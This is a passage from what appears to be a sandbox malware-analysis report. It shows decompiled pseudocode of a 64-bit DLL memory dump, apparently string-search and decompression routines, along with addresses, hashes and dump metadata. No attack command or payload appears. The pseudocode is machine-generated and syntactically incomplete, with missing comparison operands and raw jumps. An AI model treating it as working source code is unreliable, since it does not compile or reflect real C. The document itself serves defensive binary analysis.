				if (_t124 > 0) goto 0xf305806a;
				if (_t124 < 0) goto 0xf3058076;
				 *((long long*)(_t268 + 0x20)) = __r8;
				 *((long long*)(_t268 + 0x28)) = __rcx;
				if (( <=  ? __rdx : _t285) + _t283 - _t293 > 0) goto 0xf3058087;
				if (E000007FE7FEF30F2860(_t82, __r9, __r9 + ( <=  ? __rdx : _t285), _t283) == 0) goto 0xf3057d80;
				_t289 =  >  ? _t283 : _t293 - _t283;
				_t157 = _t293 - 1;
				if (_t157 - 3 >= 0) goto 0xf3057f11;
				_t271 =  *((intOrPtr*)(_t268 + 0x28));
				_t276 =  *((intOrPtr*)(_t268 + 0x20));
				goto 0xf3057f59;
				 *_t276 = _t281;
				 *((long long*)(_t276 + 8)) = _t271;
				 *((long long*)(_t276 + 0x10)) = _t281;
				asm("xorps xmm0, xmm0");
				asm("inc ecx");
				 *((long long*)(_t276 + 0x28)) = 0;
				 *((long long*)(_t276 + 0x30)) = _t271;
				 *((short*)(_t276 + 0x38)) = 0x101;
				 *((char*)(_t276 + 0x3a)) = 0;
				goto 0xf3058033;
				r14d = 1;
				goto 0xf3057c9b;
				_t193 = _t157 + _t251 + 1;
				_t291 = _t193 - _t229;
				_t179 = _t193 + _t251;
				_t158 = _t193;
				if (_t179 - _t293 >= 0) goto 0xf3057cf1;
				_t194 = _t229 + _t251;
				if (_t194 - _t293 >= 0) goto 0xf3058044;
				_t131 =  *((intOrPtr*)(_t281 + _t179)) - ( *(_t281 + _t194) & 0x000000ff);
				if (_t131 < 0) goto 0xf3057c80;
				if (_t131 != 0) goto 0xf3057ce0;
				_t252 = _t251 + 1;
				_t181 =  ==  ? _t242 : _t252;
				_t253 =  !=  ? _t242 : _t252;
				_t195 =  !=  ? _t242 : _t252;
				_t196 = ( !=  ? _t242 : _t252) + _t158;
				_t254 = _t181;
				goto 0xf3057c8f;
				asm("o16 nop [cs:eax+eax]");
				r14d = 1;
				goto 0xf3057c8f;
				r13d = 0;
				goto 0xf3057d2f;
				_t199 = _t158 + _t181 + 1;
				_t243 = _t199 + _t181;
				_t159 = _t199;
				if (_t243 - _t293 >= 0) goto 0xf3057bb6;
				_t200 = _t181 + _t283;
				if (_t200 - _t293 >= 0) goto 0xf3058044;
				_t135 =  *((intOrPtr*)(_t281 + _t243)) - ( *(_t281 + _t200) & 0x000000ff);
				if (_t135 > 0) goto 0xf3057d10;
				if (_t135 != 0) goto 0xf3057d70;
				_t182 = _t181 + 1;
				_t245 =  ==  ? _t254 : _t182;
				_t183 =  !=  ? _t254 : _t182;
				_t201 =  !=  ? _t254 : _t182;
				_t202 = ( !=  ? _t254 : _t182) + _t159;
				_t184 =  ==  ? _t254 : _t182;
				goto 0xf3057d1f;
				asm("o16 nop [cs:eax+eax]");
				_t284 = _t159;
				goto 0xf3057d1f;
				r8d = 0;
				goto 0xf3057dbd;
				asm("o16 nop [cs:eax+eax]");
				_t232 = _t199 - _t283 + _t254 + 1;
				_t247 = _t232 - _t184;
				_t185 = _t184;
				_t221 = _t232;
				if (_t247 == _t291) goto 0xf3057e29;
				if (_t221 + _t254 - _t293 >= 0) goto 0xf3057e29;
				_t206 = _t293 - _t254 +  !_t221;
				if (_t206 - _t293 >= 0) goto 0xf305804d;
				_t166 =  !_t254 + _t293 - _t185;
				if (_t166 - _t293 >= 0) goto 0xf3058056;
				_t141 =  *((intOrPtr*)(_t281 + _t206)) - ( *(_t281 + _t166) & 0x000000ff);
				if (_t141 < 0) goto 0xf3057da0;
				if (_t141 != 0) goto 0xf3057e20;
				_t255 = _t254 + 1;
				_t168 =  ==  ? _t271 : _t255;
				_t256 =  !=  ? _t271 : _t255;
				_t234 =  !=  ? _t271 : _t255;
				_t235 = ( !=  ? _t271 : _t255) + _t221;
				_t257 =  ==  ? _t271 : _t255;
				goto 0xf3057daf;
				goto 0xf3057db2;
				r9d = 1;
				r8d = 0;
				goto 0xf3057e5d;
				_t237 = _t247 + _t221 + 1;
				_t258 = _t257;
				_t223 = _t237;
				if (_t237 - _t257 == _t291) goto 0xf3057eca;
				if (_t223 + _t247 - _t293 >= 0) goto 0xf3057eca;
				_t209 = _t293 - _t247 +  !_t223;
				if (_t209 - _t293 >= 0) goto 0xf305804d;
				_t175 =  !_t247 + _t293 - _t258;
				if (_t175 - _t293 >= 0) goto 0xf3058056;
				_t147 =  *((intOrPtr*)(_t281 + _t209)) - ( *(_t281 + _t175) & 0x000000ff);
				if (_t147 > 0) goto 0xf3057e40;
				if (_t147 != 0) goto 0xf3057ec0;
				_t248 = _t247 + 1;
				_t177 =  ==  ? _t271 : _t248;
				_t249 =  !=  ? _t271 : _t248;
				_t239 =  !=  ? _t271 : _t248;
				_t240 = ( !=  ? _t271 : _t248) + _t223;
				_t250 =  ==  ? _t271 : _t248;
				goto 0xf3057e4f;
				r9d = 1;
				goto 0xf3057e52;
				_t259 =  >  ? _t185 : _t258;
				if (_t291 - _t293 > 0) goto 0xf3058093;
				_t211 = _t293 - ( >  ? _t185 : _t258);
				if (_t291 == 0) goto 0xf3057f86;
				_t178 = _t291 - 1;
				_t152 = _t178 - 3;
				if (_t152 >= 0) goto 0xf3057f92;
				goto 0xf3057fc9;
				_t273 =  *((intOrPtr*)(_t268 + 0x28));
				_t280 =  *((intOrPtr*)(_t268 + 0x20));
				asm("o16 nop [eax+eax]");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				if (_t152 != 0) goto 0xf3057f30;
				if (_t211 == 0) goto 0xf3057f70;
				asm("dec eax");
				_t154 = _t211 - (_t293 & 0xfffffffc) + 0xfffffffffffffffd;
				if (_t154 != 0) goto 0xf3057f60;
				_t292 = _t291 + 1;
				goto 0xf3057ff3;
				_t227 = _t293;
				r14d = 0;
				goto 0xf3057ff3;
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				asm("dec eax");
				if (_t154 != 0) goto 0xf3057fa0;
				if (_t227 == 0) goto 0xf3057ff0;
				asm("o16 nop [cs:eax+eax]");
				asm("dec eax");
				if (_t227 != ( !=  ? _t271 : _t248) + _t223 + 1) goto 0xf3057fe0;
				 *_t273 =  *((intOrPtr*)(_t268 + 0x30));
				 *((long long*)(_t273 + 8)) = _t280;
				 *((long long*)(_t273 + 0x10)) = _t281;
				 *(_t273 + 0x18) = _t293;
				 *((long long*)(_t273 + 0x20)) = 1;
				 *((long long*)(_t273 + 0x28)) = _t284;
				 *((long long*)(_t273 + 0x30)) = _t284;
				 *(_t273 + 0x38) = _t292;
				 *((long long*)(_t273 + 0x40)) = _t178;
				 *((long long*)(_t273 + 0x48)) = 0;
				 *((long long*)(_t273 + 0x50)) = _t280;
				 *((long long*)(_t273 + 0x58)) = (_t292 & 0xfffffffc) + 0xfffffffc;
				 *(_t273 + 0x60) = _t293;
				return 0;
			}

0x7fef3057b80
0x7fef3057b86
0x7fef3057b91
0x7fef3057b9b
0x7fef3057ba0
0x7fef3057ba6
0x7fef3057bb3
0x7fef3057bb9
0x7fef3057bbd
0x7fef3057bc1
0x7fef3057bc4
0x7fef3057bd0
0x7fef3057bd6
0x7fef3057bdb
0x7fef3057be3
0x7fef3057bfa
0x7fef3057c09
0x7fef3057c0d
0x7fef3057c1b
0x7fef3057c26
0x7fef3057c2b
0x7fef3057c30
0x7fef3057c35
0x7fef3057c38
0x7fef3057c3c
0x7fef3057c40
0x7fef3057c43
0x7fef3057c48
0x7fef3057c50
0x7fef3057c54
0x7fef3057c5b
0x7fef3057c60
0x7fef3057c75
0x7fef3057c7b
0x7fef3057c84
0x7fef3057c8a
0x7fef3057c8f
0x7fef3057c93
0x7fef3057c99
0x7fef3057c9b
0x7fef3057ca2
0x7fef3057cad
0x7fef3057cb1
0x7fef3057cb3
0x7fef3057cb5
0x7fef3057cbe
0x7fef3057cc2
0x7fef3057cc6
0x7fef3057cc9
0x7fef3057ccc
0x7fef3057ccf
0x7fef3057cd1
0x7fef3057ce4
0x7fef3057cef
0x7fef3057cf8
0x7fef3057d07
0x7fef3057d14
0x7fef3057d1f
0x7fef3057d23
0x7fef3057d29
0x7fef3057d2f
0x7fef3057d36
0x7fef3057d41
0x7fef3057d45
0x7fef3057d47
0x7fef3057d49
0x7fef3057d52
0x7fef3057d56
0x7fef3057d5a
0x7fef3057d5d
0x7fef3057d60
0x7fef3057d63
0x7fef3057d65
0x7fef3057d7b
0x7fef3057d7e
0x7fef3057d85
0x7fef3057d91
0x7fef3057d93
0x7fef3057da4
0x7fef3057daa
0x7fef3057db2
0x7fef3057db5
0x7fef3057dbb
0x7fef3057dc4
0x7fef3057dd2
0x7fef3057dd8
0x7fef3057de7
0x7fef3057ded
0x7fef3057dfc
0x7fef3057e00
0x7fef3057e02
0x7fef3057e04
0x7fef3057e0d
0x7fef3057e11
0x7fef3057e15
0x7fef3057e18
0x7fef3057e1b
0x7fef3057e1e
0x7fef3057e27
0x7fef3057e29
0x7fef3057e2f
0x7fef3057e3b
0x7fef3057e44
0x7fef3057e52
0x7fef3057e55
0x7fef3057e5b
0x7fef3057e64
0x7fef3057e72
0x7fef3057e78
0x7fef3057e87
0x7fef3057e8d
0x7fef3057e9c
0x7fef3057ea0
0x7fef3057ea2
0x7fef3057ea4
0x7fef3057ead
0x7fef3057eb1
0x7fef3057eb5
0x7fef3057eb8
0x7fef3057ebb
0x7fef3057ebe
0x7fef3057ec0
0x7fef3057ec8
0x7fef3057ecd
0x7fef3057ed4
0x7fef3057edd
0x7fef3057eed
0x7fef3057ef3
0x7fef3057efd
0x7fef3057f01
0x7fef3057f0c
0x7fef3057f1d
0x7fef3057f22
0x7fef3057f27
0x7fef3057f37
0x7fef3057f3b
0x7fef3057f43
0x7fef3057f4f
0x7fef3057f57
0x7fef3057f5c
0x7fef3057f64
0x7fef3057f6b
0x7fef3057f6e
0x7fef3057f70
0x7fef3057f84
0x7fef3057f88
0x7fef3057f8d
0x7fef3057f90
0x7fef3057fa7
0x7fef3057fab
0x7fef3057fb3
0x7fef3057fbf
0x7fef3057fc7
0x7fef3057fce
0x7fef3057fd2
0x7fef3057fe4
0x7fef3057fee
0x7fef3057ff8
0x7fef3057ffb
0x7fef3057fff
0x7fef3058003
0x7fef3058007
0x7fef305800f
0x7fef3058013
0x7fef3058017
0x7fef305801b
0x7fef305801f
0x7fef3058027
0x7fef305802b
0x7fef305802f
0x7fef3058043

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d288b6c9cb2b1b2b853802f56d70b82b5c64b3b706bd4f732ff91257dee4cd03
Instruction ID: b99887225f54c39df3ac27067f4b66d84c2f92b93ab976c85ee92970d586ff9b
Opcode Fuzzy Hash: d288b6c9cb2b1b2b853802f56d70b82b5c64b3b706bd4f732ff91257dee4cd03
Instruction Fuzzy Hash: 24D1F372B0979589EAD0CA2695087B9A7D2A344FE4F5847339E6E077E0DA7CE445B300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30603C7 Relevance: .4, Instructions: 371
COMMONCrypto

Download Yara Rule

C-Code - Quality: 52%

			E000007FE7FEF30603C7(signed int __ebx, signed int __ebp, signed int __rax, signed int __rcx, signed int __rdx, void* __rsi, long long __r9, void* __r10, void* __r12, long long __r13, void* __r14, void* __r15) {
				signed int _t314;
				signed int _t317;
				signed int _t320;
				unsigned int _t325;
				signed int _t326;
				short _t328;
				signed int _t342;
				signed short _t344;
				signed int _t345;
				signed int _t347;
				signed int _t355;
				signed short _t357;
				signed char _t366;
				signed int _t372;
				signed int _t375;
				unsigned int _t379;
				signed int _t408;
				signed int _t418;
				signed char _t425;
				signed char _t431;
				signed int _t435;
				signed char _t439;
				signed int _t442;
				signed char _t461;
				unsigned int _t468;
				signed char _t470;
				signed int _t480;
				signed int _t485;
				signed int _t498;
				signed int _t499;
				signed int _t505;
				signed int _t506;
				signed short _t509;
				void* _t513;
				signed int _t516;
				signed int _t521;
				signed int _t524;
				signed int _t527;
				signed char _t529;
				signed int _t537;
				signed int _t561;
				signed int _t564;
				void* _t591;
				short _t599;
				void* _t604;
				signed int _t632;
				signed int _t633;
				void* _t637;
				void* _t640;
				void* _t642;
				signed int _t650;
				signed long long _t654;
				signed long long _t660;
				signed long long _t661;
				long long _t677;
				signed int _t686;
				signed long long _t687;
				signed long long _t688;
				signed long long _t692;
				signed long long _t693;
				signed long long _t694;
				signed long long _t695;
				signed long long _t696;
				signed long long _t697;
				signed long long _t698;
				signed long long _t700;
				void* _t701;
				long long* _t708;
				signed long long _t710;
				signed long long _t714;
				signed long long _t715;
				intOrPtr _t725;
				void* _t727;
				long long _t730;
				signed long long _t731;
				intOrPtr _t732;
				signed long long _t734;
				unsigned long long _t741;
				unsigned long long _t742;
				intOrPtr _t751;
				signed long long _t756;
				unsigned long long _t758;
				signed long long _t765;
				signed long long _t766;
				signed long long _t770;
				signed long long _t774;
				void* _t776;
				signed long long _t785;
				signed long long _t792;
				signed char* _t797;
				signed long long _t812;
				void* _t814;
				intOrPtr _t818;
				void* _t820;
				intOrPtr _t827;
				intOrPtr _t830;
				signed char* _t835;
				intOrPtr _t838;
				intOrPtr _t839;
				intOrPtr _t841;
				signed long long _t842;
				long long _t845;
				signed char* _t848;
				signed char* _t858;
				void* _t865;
				void* _t866;
				signed int* _t867;
				signed long long _t873;

				_t314 =  *(_t814 + 0x40);
				_t505 =  *(_t814 + 0x50);
				if (_t314 - 3 > 0) goto 0xf3060605;
				_t425 =  *(_t814 + 0x38);
				if (_t425 == 0) goto 0xf3060421;
				if (_t425 - 8 >= 0) goto 0xf3060436;
				if (__r14 == __r15) goto 0xf3060413;
				_t710 =  *(_t814 + 0x30) | __rdx << _t425;
				 *(_t814 + 0x30) = _t710;
				 *(_t814 + 0x38) = _t425 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t505;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (__r14 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t741 = _t710 >> 8;
				 *(_t814 + 0x30) = _t741;
				 *(_t814 + 0x38) = ( *(__r10 + 0x14) << 8) + 0xfffffff8;
				_t485 =  *(__r10 + 0x14) << 8;
				_t431 = __ebx & 0x000000ff | _t485;
				 *(__r10 + 0x14) = _t431;
				 *(_t814 + 0x40) = _t314 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t505;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t317 = _t431 & 0x000000ff;
				if (_t317 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t537 =  !__ebp & _t485;
				_t742 = _t741 >> _t317;
				 *(_t814 + 0x30) = _t742;
				 *(_t814 + 0x38) = __ebx;
				 *(_t814 + 0x40) =  *(_t814 + 0x40) + _t537;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t814 + 0x30) = _t742 >> _t317;
				 *(_t814 + 0x38) = __ebx;
				 *(_t814 + 0x3c) =  *(_t814 + 0x3c) + ( !_t537 & _t485);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t814 + 0x30) = _t710 >> _t317;
				 *(_t814 + 0x38) = _t505;
				 *(_t814 + 0x80) = __rax;
				 *(_t814 + 0x88) = __rax;
				 *((long long*)(_t814 + 0x90)) = 0xb;
				_t435 =  *(_t814 + 0x3c);
				_t654 = __rax & __rcx;
				if (3 == 3) goto 0xf30612f1;
				if (_t435 != 0x10) goto 0xf30606d9;
				if (__rsi - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t814 + 0x30) = _t654 >> 8;
				 *(_t814 + 0x38) = _t435 + 0xfffffff8;
				 *(_t814 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t320 =  *(__r10 + 0x291d) & 0x0000ffff;
				 *(_t814 + 0x40) = _t320;
				r12b = 0x1e;
				if (_t320 !=  !( *(__r10 + 0x291f) & 0x0000ffff)) goto 0xf305f43b;
				r12b = 0x14;
				if (_t320 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t725 =  *((intOrPtr*)(_t814 + 0x128));
				E000007FE7FEF30F24C0();
				_t838 =  *((intOrPtr*)(_t814 + 0x58));
				 *(_t814 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t654 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t814 + 0x6c);
				if (_t725 - 1 > 0) goto 0xf3060acc;
				_t439 =  *(_t814 + 0x38);
				_t325 =  *((short*)(_t838 + 0x3c + _t654 * 2));
				if (_t325 < 0) goto 0xf3060659;
				if ((_t325 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t326 = _t325 >> 9;
				if (_t439 - _t326 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t439 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t326 - 0x23f > 0) goto 0xf3061218;
				_t328 =  *((short*)(_t838 + 0x83c + _t654 * 2));
				if (_t328 >= 0) goto 0xf3060690;
				if (_t439 - 0xc >= 0) goto 0xf3060663;
				if (_t328 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t865 = __r15 + 1;
				 *(_t814 + 0x30) =  *(_t814 + 0x30) | _t654 << _t439;
				 *(_t814 + 0x38) = _t725 + 8;
				_t591 = _t439 - 6;
				if (_t591 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t776 =  *((intOrPtr*)(_t814 + 0x80 + _t654 * 8)) + (_t710 & 0xffffffff);
				if (_t591 < 0) goto 0xf30613e0;
				if (_t776 + __rsi - 0x1c9 > 0) goto 0xf30613f4;
				if (_t776 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t814 + 0x40) =  *(_t814 + 0x40) + _t505;
				r12b = 0xa;
				_t839 =  *((intOrPtr*)(_t814 + 0x58));
				_t845 =  *((intOrPtr*)(_t814 + 0x1a0));
				_t818 =  *((intOrPtr*)(_t814 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t521 =  *(_t814 + 0x38);
				 *(_t814 + 0x68) =  *(_t814 + 0x3c);
				r9d =  *(_t814 + 0x44);
				_t660 = __r15 - _t865;
				r12b = 0xc;
				if (_t660 - 0xe < 0) goto 0xf3060b66;
				if (_t521 - 0x1d > 0) goto 0xf3060794;
				_t661 = _t660 << _t521;
				_t866 = _t865 + 4;
				_t442 =  *((short*)(_t839 + 0x3c + _t661 * 2));
				if (_t442 < 0) goto 0xf30607bc;
				if ((_t442 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t442 - 0x23f > 0) goto 0xf306126f;
				_t599 =  *((short*)(_t839 + 0x83c +  &(( *(_t814 + 0xe8))[__rsi]) * 2));
				if (_t599 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t599 < 0) goto 0xf30608a8;
				_t342 =  *((short*)(_t839 + 0x3c + _t661 * 2));
				if (_t342 < 0) goto 0xf3060820;
				if ((_t342 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t342 - 0x23f > 0) goto 0xf306127b;
				_t344 =  *((short*)(_t839 + 0x83c + _t661 * 2));
				if (_t344 < 0) goto 0xf3060825;
				_t345 = _t344 & 0x0000ffff;
				_t604 = _t818 -  *((intOrPtr*)(_t814 + 0x1a8));
				if (_t604 >= 0) goto 0xf3061284;
				_t524 = _t521 + 0x20;
				 *((intOrPtr*)(_t845 + _t818)) = bpl;
				_t727 = _t818 + 1;
				asm("bt eax, 0x8");
				if (_t604 < 0) goto 0xf30608a3;
				_t751 =  *((intOrPtr*)(_t814 + 0x1a8));
				if (_t727 - _t751 >= 0) goto 0xf30612a2;
				 *(_t845 + _t818 + 1) = _t345;
				if (_t751 - _t818 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t820 = _t727;
				_t347 = _t345 & 0x000001ff;
				if (_t347 == 0x100) goto 0xf3060b5e;
				if (_t347 - 0x11d > 0) goto 0xf3061298;
				if (_t524 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t866 - 3 <= 0) goto 0xf306140a;
				_t867 = _t866 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t355 =  *((short*)(_t839 + 0xdda));
				if (_t355 < 0) goto 0xf3060955;
				if ((_t355 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t355 - 0x23f > 0) goto 0xf306127b;
				_t357 =  *((short*)(_t839 + 0x15da));
				if (_t357 < 0) goto 0xf306095a;
				_t527 = _t524 + 0x20 - r9d - 0xb;
				if ((_t357 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t814 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t814 + 0x118)) = __r9;
				if (r9d == 0) goto 0xf3060a01;
				if (_t527 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t867 - 3 <= 0) goto 0xf306140a;
				_t785 = ((( *(_t814 + 0x30) | _t661) >> 0x0000000a >> 0xb | __r15 - _t866 << _t524) >> r9d >> 0xb | 0xffffffff << r9d << _t527) >> r9d;
				_t529 = _t527 + 0x20 - r9d;
				 *(_t814 + 0x68) = ( !( *_t867) & _t505) +  *(_t814 + 0x68);
				r9d =  *(_t814 + 0x68);
				if (_t820 - __r9 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t814 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t814 + 0x70)) = __r13;
				 *((long long*)(_t814 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t814 + 0x28)) =  *(_t814 + 0xb8);
				 *((long long*)(_t814 + 0x20)) = 0xf311ef68;
				_t730 = _t845;
				_t756 =  *((intOrPtr*)(_t814 + 0x1a8));
				E000007FE7FEF306148C(_t730, _t756, _t820, __r9);
				if ( *((intOrPtr*)(_t814 + 0x1a8)) - _t820 +  *((intOrPtr*)(_t814 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t814 + 0x40) = _t529;
				goto 0xf305f43b;
				_t677 =  *(_t814 + 0xb8);
				 *((long long*)(_t814 + 0x28)) = _t677;
				 *((long long*)(_t814 + 0x20)) = _t730;
				_t731 =  *((intOrPtr*)(_t814 + 0x1a0));
				_t366 = E000007FE7FEF306148C(_t731, _t756, _t730,  *((intOrPtr*)(_t814 + 0x118)));
				_t841 =  *((intOrPtr*)(_t814 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t461 = _t366;
				_t758 = _t756 << _t461 |  *(_t814 + 0x30);
				 *(_t814 + 0x30) = _t758;
				 *(_t814 + 0x38) = _t366 + 0x10;
				goto 0xf3060aee;
				_t506 =  *((short*)(_t841 + 0x3c + _t731 * 2));
				if (_t506 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t506 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t509 =  *((short*)(_t841 + 0x83c + _t785 * 2));
				if (_t509 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t814 + 0x30) = _t758 >> 0xb;
				 *(_t814 + 0x38) = _t461 - 0xb;
				 *(_t814 + 0x40) = _t509 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t814 + 0x30) = _t785;
				 *(_t814 + 0x38) = _t529;
				 *(_t814 + 0x3c) =  *(_t814 + 0x68);
				 *(_t814 + 0x40) = 0x100;
				 *(_t814 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t731 + 8)) = 0xfd;
				 *_t731 = _t677;
				 *((long long*)(_t731 + 0x10)) = _t677;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t842 =  *((intOrPtr*)(_t814 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t372 = r9b & 0xffffffff;
				if (_t372 == 0xfc) goto 0xf3060cbe;
				_t468 =  *(_t814 + 0x38);
				_t513 =  >=  ? _t372 - r15d + r14d : _t468 >> 3;
				_t375 = _t785 * 8;
				 *(_t814 + 0x38) = _t468 - _t375;
				_t792 =  &(_t867[1]);
				_t812 =  *((intOrPtr*)(_t814 + 0x1b0));
				goto 0xf3060cc0;
				_t732 =  *((intOrPtr*)(_t814 + 0x1a8));
				if ( *((intOrPtr*)(_t814 + 0x70)) != _t732) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t375 & 0xffffff00 | r12b == 0x00000017);
				_t827 = _t732;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t842 + 0x291c) = r12b;
				_t470 =  *(_t814 + 0x38);
				 *(_t842 + 8) = _t470;
				 *(_t842 + 0x24) =  *(_t814 + 0x3c);
				 *(_t842 + 0x28) =  *(_t814 + 0x40);
				 *(_t842 + 0x2c) =  *(_t814 + 0x44);
				 *_t842 =  !(0xffffffff << _t470) &  *(_t814 + 0x30);
				_t632 =  *(_t814 + 0x1b8) & 0x00000040;
				if (_t632 != 0) goto 0xf3061169;
				if (_t632 == 0) goto 0xf3061169;
				_t633 = r9b;
				if (_t633 < 0) goto 0xf3061169;
				_t714 = _t827 - _t812;
				if (_t633 < 0) goto 0xf306137a;
				 *(_t814 + 0xb8) = _t785;
				 *(_t814 + 0x6c) = r9d;
				if (_t827 -  *((intOrPtr*)(_t814 + 0x1a8)) > 0) goto 0xf3061389;
				_t379 =  *(_t842 + 0x20);
				_t848 =  *((intOrPtr*)(_t814 + 0x1a0)) + _t812;
				_t516 = _t379 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t734 = _t714 & 0xfffffffc;
				 *(_t814 + 0xf8) = _t714;
				 *(_t814 + 0x108) = _t714;
				_t686 = _t734 - 0x3f51f0dfc0;
				 *(_t814 + 0x50) = _t686;
				r12d = 0x56c0;
				 *(_t814 + 0xe8) = _t848;
				 *(_t814 + 0xd8) = _t792;
				 *(_t814 + 0x7c) = _t516;
				 *(_t814 + 0x100) = _t734;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t516 * 0x56c0;
				_t858 = _t848;
				 *(_t814 + 0x80) =  *_t858 & 0x000000ff;
				 *(_t814 + 0x84) = _t858[1] & 0x000000ff;
				 *(_t814 + 0x88) = _t858[2] & 0x000000ff;
				 *(_t814 + 0x8c) = _t858[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t814 + 0xc0 + _t842 * 4)) =  *((intOrPtr*)(_t814 + 0xc0 + _t842 * 4)) +  *((intOrPtr*)(_t814 + 0x80 + _t842 * 4));
				_t204 = _t842 + 1; // 0x1
				if (_t204 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t814 + 0xa0 + _t792 * 4)) =  *((intOrPtr*)(_t814 + 0xa0 + _t792 * 4)) +  *((intOrPtr*)(_t814 + 0x80 + _t792 * 4));
				_t214 = _t792 + 1; // 0x1
				_t637 = _t214 - 4;
				if (_t637 != 0) goto 0xf3060e4c;
				_t687 = _t686 + 0xfffffffc;
				if (_t637 != 0) goto 0xf3060dea;
